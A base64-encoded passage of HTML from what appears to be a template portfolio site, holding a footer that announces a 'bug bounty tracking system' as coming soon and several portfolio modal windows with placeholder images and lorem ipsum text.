PgogICAgICAgICAgICAgICAgICAgICAgICA8aDQgY2xhc3M9InRleHQtdXBwZXJjYXNlIG1iLTQiPkNvbWluZyBTb29uPC9oND4KICAgICAgICAgICAgICAgICAgICAgICAgPHAgY2xhc3M9ImxlYWQgbWItMCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdWcgYm91bnR5IHRyYWNraW5nIHN5c3RlbS4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgPC9wPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZm9vdGVyPgogICAgICAgIDwhLS0gQ29weXJpZ2h0IFNlY3Rpb24tLT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb3B5cmlnaHQgcHktNCB0ZXh0LWNlbnRlciB0ZXh0LXdoaXRlIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj48c21hbGw+Q29weXJpZ2h0IMKpIEpvaG4gMjAyMDwvc21hbGw+PC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPCEtLSBTY3JvbGwgdG8gVG9wIEJ1dHRvbiAoT25seSB2aXNpYmxlIG9uIHNtYWxsIGFuZCBleHRyYS1zbWFsbCBzY3JlZW4gc2l6ZXMpLS0+CiAgICAgICAgPGRpdiBjbGFzcz0ic2Nyb2xsLXRvLXRvcCBkLWxnLW5vbmUgcG9zaXRpb24tZml4ZWQiPgogICAgICAgICAgICA8YSBjbGFzcz0ianMtc2Nyb2xsLXRyaWdnZXIgZC1ibG9jayB0ZXh0LWNlbnRlciB0ZXh0LXdoaXRlIHJvdW5kZWQiIGhyZWY9IiNwYWdlLXRvcCI+PGkgY2xhc3M9ImZhIGZhLWNoZXZyb24tdXAiPjwvaT48L2E+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWxzLS0+CiAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWwgMS0tPgogICAgICAgIDxkaXYgY2xhc3M9InBvcnRmb2xpby1tb2RhbCBtb2RhbCBmYWRlIiBpZD0icG9ydGZvbGlvTW9kYWwxIiB0YWJpbmRleD0iLTEiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJwb3J0Zm9saW9Nb2RhbDFMYWJlbCIgYXJpYS1oaWRkZW49InRydWUiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJtb2RhbC1kaWFsb2cgbW9kYWwteGwiIHJvbGU9ImRvY3VtZW50Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9Im1vZGFsLWNvbnRlbnQiPgogICAgICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9ImNsb3NlIiB0eXBlPSJidXR0b24iIGRhdGEtZGlzbWlzcz0ibW9kYWwiIGFyaWEtbGFiZWw9IkNsb3NlIj4KICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gYXJpYS1oaWRkZW49InRydWUiPjxpIGNsYXNzPSJmYXMgZmEtdGltZXMiPjwvaT48L3NwYW4+CiAgICAgICAgICAgICAgICAgICAgPC9idXR0b24+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibW9kYWwtYm9keSB0ZXh0LWNlbnRlciI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJyb3cganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLWxnLTgiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8IS0tIFBvcnRmb2xpbyBNb2RhbCAtIFRpdGxlLS0+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxoMiBjbGFzcz0icG9ydGZvbGlvLW1vZGFsLXRpdGxlIHRleHQtc2Vjb25kYXJ5IHRleHQtdXBwZXJjYXNlIG1iLTAiIGlkPSJwb3J0Zm9saW9Nb2RhbDFMYWJlbCI+TG9nIENhYmluPC9oMj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBJY29uIERpdmlkZXItLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20iPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20tbGluZSI+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1pY29uIj48aSBjbGFzcz0iZmFzIGZhLXN0YXIiPjwvaT48L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tLWxpbmUiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWwgLSBJbWFnZS0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8aW1nIGNsYXNzPSJpbWctZmx1aWQgcm91bmRlZCBtYi01IiBzcmM9ImFzc2V0cy9pbWcvcG9ydGZvbGlvL2NhYmluLnBuZyIgYWx0PSIiIC8+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gVGV4dC0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8cCBjbGFzcz0ibWItNSI+TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2ljaW5nIGVsaXQuIE1vbGxpdGlhIG5lcXVlIGFzc3VtZW5kYSBpcHNhbSBuaWhpbCwgbW9sZXN0aWFzIG1hZ25hbSwgcmVjdXNhbmRhZSBxdW9zIHF1aXMgaW52ZW50b3JlIHF1aXNxdWFtIHZlbGl0IGFzcGVyaW9yZXMsIHZpdGFlPyBSZXByZWhlbmRlcml0IHNvbHV0YSwgZW9zIHF1b2QgY29uc2VxdXVudHVyIGl0YXF1ZS4gTmFtLjwvcD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IiBkYXRhLWRpc21pc3M9Im1vZGFsIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpIGNsYXNzPSJmYXMgZmEtdGltZXMgZmEtZnciPjwvaT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENsb3NlIFdpbmRvdwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8IS0tIFBvcnRmb2xpbyBNb2RhbCAyLS0+CiAgICAgICAgPGRpdiBjbGFzcz0icG9ydGZvbGlvLW1vZGFsIG1vZGFsIGZhZGUiIGlkPSJwb3J0Zm9saW9Nb2RhbDIiIHRhYmluZGV4PSItMSIgcm9sZT0iZGlhbG9nIiBhcmlhLWxhYmVsbGVkYnk9InBvcnRmb2xpb01vZGFsMkxhYmVsIiBhcmlhLWhpZGRlbj0idHJ1ZSI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9Im1vZGFsLWRpYWxvZyBtb2RhbC14bCIgcm9sZT0iZG9jdW1lbnQiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibW9kYWwtY29udGVudCI+CiAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iY2xvc2UiIHR5cGU9ImJ1dHRvbiIgZGF0YS1kaXNtaXNzPSJtb2RhbCIgYXJpYS1sYWJlbD0iQ2xvc2UiPgogICAgICAgICAgICAgICAgICAgICAgICA8c3BhbiBhcmlhLWhpZGRlbj0idHJ1ZSI+PGkgY2xhc3M9ImZhcyBmYS10aW1lcyI+PC9pPjwvc3Bhbj4KICAgICAgICAgICAgICAgICAgICA8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJtb2RhbC1ib2R5IHRleHQtY2VudGVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyBqdXN0aWZ5LWNvbnRlbnQtY2VudGVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctOCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gVGl0bGUtLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGgyIGNsYXNzPSJwb3J0Zm9saW8tbW9kYWwtdGl0bGUgdGV4dC1zZWNvbmRhcnkgdGV4dC11cHBlcmNhc2UgbWItMCIgaWQ9InBvcnRmb2xpb01vZGFsMkxhYmVsIj5UYXN0eSBDYWtlPC9oMj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBJY29uIERpdmlkZXItLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20iPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20tbGluZSI+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1pY29uIj48aSBjbGFzcz0iZmFzIGZhLXN0YXIiPjwvaT48L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tLWxpbmUiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWwgLSBJbWFnZS0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8aW1nIGNsYXNzPSJpbWctZmx1aWQgcm91bmRlZCBtYi01IiBzcmM9ImFzc2V0cy9pbWcvcG9ydGZvbGlvL2Nha2UucG5nIiBhbHQ9IiIgLz4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWwgLSBUZXh0LS0+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwIGNsYXNzPSJtYi01Ij5Mb3JlbSBpcHN1bSBkb2xvciBzaXQgYW1ldCwgY29uc2VjdGV0dXIgYWRpcGlzaWNpbmcgZWxpdC4gTW9sbGl0aWEgbmVxdWUgYXNzdW1lbmRhIGlwc2FtIG5paGlsLCBtb2xlc3RpYXMgbWFnbmFtLCByZWN1c2FuZGFlIHF1b3MgcXVpcyBpbnZlbnRvcmUgcXVpc3F1YW0gdmVsaXQgYXNwZXJpb3Jlcywgdml0YWU/IFJlcHJlaGVuZGVyaXQgc29sdXRhLCBlb3MgcXVvZCBjb25zZXF1dW50dXIgaXRhcXVlLiBOYW0uPC9wPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YnV0dG9uIGNsYXNzPSJidG4gYnRuLXByaW1hcnkiIGRhdGEtZGlzbWlzcz0ibW9kYWwiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGkgY2xhc3M9ImZhcyBmYS10aW1lcyBmYS1mdyI+PC9pPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2xvc2UgV2luZG93CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvYnV0dG9uPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIDMtLT4KICAgICAgICA8ZGl2IGNsYXNzPSJwb3J0Zm9saW8tbW9kYWwgbW9kYWwgZmFkZSIgaWQ9InBvcnRmb2xpb01vZGFsMyIgdGFiaW5kZXg9Ii0xIiByb2xlPSJkaWFsb2ciIGFyaWEtbGFiZWxsZWRieT0icG9ydGZvbGlvTW9kYWwzTGFiZWwiIGFyaWEtaGlkZGVuPSJ0cnVlIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibW9kYWwtZGlhbG9nIG1vZGFsLXhsIiByb2xlPSJkb2N1bWVudCI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJtb2RhbC1jb250ZW50Ij4KICAgICAgICAgICAgICAgICAgICA8YnV0dG9uIGNsYXNzPSJjbG9zZSIgdHlwZT0iYnV0dG9uIiBkYXRhLWRpc21pc3M9Im1vZGFsIiBhcmlhLWxhYmVsPSJDbG9zZSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxzcGFuIGFyaWEtaGlkZGVuPSJ0cnVlIj48aSBjbGFzcz0iZmFzIGZhLXRpbWVzIj48L2k+PC9zcGFuPgogICAgICAgICAgICAgICAgICAgIDwvYnV0dG9uPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9Im1vZGFsLWJvZHkgdGV4dC1jZW50ZXIiPgogICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93IGp1c3RpZnktY29udGVudC1jZW50ZXIiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1sZy04Ij4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWwgLSBUaXRsZS0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8aDIgY2xhc3M9InBvcnRmb2xpby1tb2RhbC10aXRsZSB0ZXh0LXNlY29uZGFyeSB0ZXh0LXVwcGVyY2FzZSBtYi0wIiBpZD0icG9ydGZvbGlvTW9kYWwzTGFiZWwiPkNpcmN1cyBUZW50PC9oMj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBJY29uIERpdmlkZXItLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20iPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20tbGluZSI+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1pY29uIj48aSBjbGFzcz0iZmFzIGZhLXN0YXIiPjwvaT48L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tLWxpbmUiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWwgLSBJbWFnZS0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8aW1nIGNsYXNzPSJpbWctZmx1aWQgcm91bmRlZCBtYi01IiBzcmM9ImFzc2V0cy9pbWcvcG9ydGZvbGlvL2NpcmN1cy5wbmciIGFsdD0iIiAvPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8IS0tIFBvcnRmb2xpbyBNb2RhbCAtIFRleHQtLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHAgY2xhc3M9Im1iLTUiPkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0LCBjb25zZWN0ZXR1ciBhZGlwaXNpY2luZyBlbGl0LiBNb2xsaXRpYSBuZXF1ZSBhc3N1bWVuZGEgaXBzYW0gbmloaWwsIG1vbGVzdGlhcyBtYWduYW0sIHJlY3VzYW5kYWUgcXVvcyBxdWlzIGludmVudG9yZSBxdWlzcXVhbSB2ZWxpdCBhc3BlcmlvcmVzLCB2aXRhZT8gUmVwcmVoZW5kZXJpdCBzb2x1dGEsIGVvcyBxdW9kIGNvbnNlcXV1bnR1ciBpdGFxdWUuIE5hbS48L3A+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9ImJ0biBidG4tcHJpbWFyeSIgZGF0YS1kaXNtaXNzPSJtb2RhbCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8aSBjbGFzcz0iZmFzIGZhLXRpbWVzIGZhLWZ3Ij48L2k+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDbG9zZSBXaW5kb3cKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9idXR0b24+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPCEtLSBQb3J0Zm9saW8gTW9kYWwgNC0tPgogICAgICAgIDxkaXYgY2xhc3M9InBvcnRmb2xpby1tb2RhbCBtb2RhbCBmYWRlIiBpZD0icG9ydGZvbGlvTW9kYWw0IiB0YWJpbmRleD0iLTEiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJwb3J0Zm9saW9Nb2RhbDRMYWJlbCIgYXJpYS1oaWRkZW49InRydWUiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJtb2RhbC1kaWFsb2cgbW9kYWwteGwiIHJvbGU9ImRvY3VtZW50Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9Im1vZGFsLWNvbnRlbnQiPgogICAgICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9ImNsb3NlIiB0eXBlPSJidXR0b24iIGRhdGEtZGlzbWlzcz0ibW9kYWwiIGFyaWEtbGFiZWw9IkNsb3NlIj4KICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gYXJpYS1oaWRkZW49InRydWUiPjxpIGNsYXNzPSJmYXMgZmEtdGltZXMiPjwvaT48L3NwYW4+CiAgICAgICAgICAgICAgICAgICAgPC9idXR0b24+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibW9kYWwtYm9keSB0ZXh0LWNlbnRlciI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJyb3cganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLWxnLTgiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8IS0tIFBvcnRmb2xpbyBNb2RhbCAtIFRpdGxlLS0+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxoMiBjbGFzcz0icG9ydGZvbGlvLW1vZGFsLXRpdGxlIHRleHQtc2Vjb25kYXJ5IHRleHQtdXBwZXJjYXNlIG1iLTAiIGlkPSJwb3J0Zm9saW9Nb2RhbDRMYWJlbCI+Q29udHJvbGxlcjwvaDI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gSWNvbiBEaXZpZGVyLS0+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tLWxpbmUiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20taWNvbiI+PGkgY2xhc3M9ImZhcyBmYS1zdGFyIj48L2k+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1saW5lIj48L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gSW1hZ2UtLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGltZyBjbGFzcz0iaW1nLWZsdWlkIHJvdW5kZWQgbWItNSIgc3JjPSJhc3NldHMvaW1nL3BvcnRmb2xpby9nYW1lLnBuZyIgYWx0PSIiIC8+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gVGV4dC0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8cCBjbGFzcz0ibWItNSI+TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2ljaW5nIGVsaXQuIE1vbGxpdGlhIG5lcXVlIGFzc3VtZW5kYSBpcHNhbSBuaWhpbCwgbW9sZXN0aWFzIG1hZ25hbSwgcmVjdXNhbmRhZSBxdW9zIHF1aXMgaW52ZW50b3JlIHF1aXNxdWFtIHZlbGl0IGFzcGVyaW9yZXMsIHZpdGFlPyBSZXByZWhlbmRlcml0IHNvbHV0YSwgZW9zIHF1b2QgY29uc2VxdXVudHVyIGl0YXF1ZS4gTmFtLjwvcD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IiBkYXRhLWRpc21pc3M9Im1vZGFsIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpIGNsYXNzPSJmYXMgZmEtdGltZXMgZmEtZnciPjwvaT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENsb3NlIFdpbmRvdwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8IS0tIFBvcnRmb2xpbyBNb2RhbCA1LS0+CiAgICAgICAgPGRpdiBjbGFzcz0icG9ydGZvbGlvLW1vZGFsIG1vZGFsIGZhZGUiIGlkPSJwb3J0Zm9saW9Nb2RhbDUiIHRhYmluZGV4PSItMSIgcm9sZT0iZGlhbG9nIiBhcmlhLWxhYmVsbGVkYnk9InBvcnRmb2xpb01vZGFsNUxhYmVsIiBhcmlhLWhpZGRlbj0idHJ1ZSI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9Im1vZGFsLWRpYWxvZyBtb2RhbC14bCIgcm9sZT0iZG9jdW1lbnQiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibW9kYWwtY29udGVudCI+CiAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iY2xvc2UiIHR5cGU9ImJ1dHRvbiIgZGF0YS1kaXNtaXNzPSJtb2RhbCIgYXJpYS1sYWJlbD0iQ2xvc2UiPgogICAgICAgICAgICAgICAgICAgICAgICA8c3BhbiBhcmlhLWhpZGRlbj0idHJ1ZSI+PGkgY2xhc3M9ImZhcyBmYS10aW1lcyI+PC9pPjwvc3Bhbj4KICAgICAgICAgICAgICAgICAgICA8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJtb2RhbC1ib2R5IHRleHQtY2VudGVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyBqdXN0aWZ5LWNvbnRlbnQtY2VudGVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctOCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gVGl0bGUtLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGgyIGNsYXNzPSJwb3J0Zm9saW8tbW9kYWwtdGl0bGUgdGV4dC1zZWNvbmRhcnkgdGV4dC11cHBlcmNhc2UgbWItMCIgaWQ9InBvcnRmb2xpb01vZGFsNUxhYmVsIj5Mb2NrZWQgU2FmZTwvaDI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gSWNvbiBEaXZpZGVyLS0+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tLWxpbmUiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20taWNvbiI+PGkgY2xhc3M9ImZhcyBmYS1zdGFyIj48L2k+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1saW5lIj48L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gSW1hZ2UtLT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGltZyBjbGFzcz0iaW1nLWZsdWlkIHJvdW5kZWQgbWItNSIgc3JjPSJhc3NldHMvaW1nL3BvcnRmb2xpby9zYWZlLnBuZyIgYWx0PSIiIC8+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwhLS0gUG9ydGZvbGlvIE1vZGFsIC0gVGV4dC0tPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8cCBjbGFzcz0ibWItNSI+TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2ljaW5nIGVsaXQuIE1vbGxpdGlhIG5lcXVlIGFzc3VtZW5kYSBpcHNhbSBuaWhpbCwgbW9sZXN0aWFzIG1hZ25hbSwgcmVjdXNhbmRhZSBxdW9zIHF1aXMgaW52ZW50b3JlIHF1aXNxdWFtIHZlbGl0IGFzcGVyaW9yZXMsIHZpdGFlPyBSZXByZWhlbmRlcml0IHNvbHV0YSwgZW9zIHF1b2QgY29uc2VxdXVudHVyIGl0YXF1ZS4gTmFtLjwvcD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IiBkYXRhLWRpc21pc3M9Im1vZGFsIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpIGNsYXNzPSJmYXMgZmEtdGltZXMgZmEtZnciPjwvaT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENsb3NlIFdpbmRvdwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICAgICAgI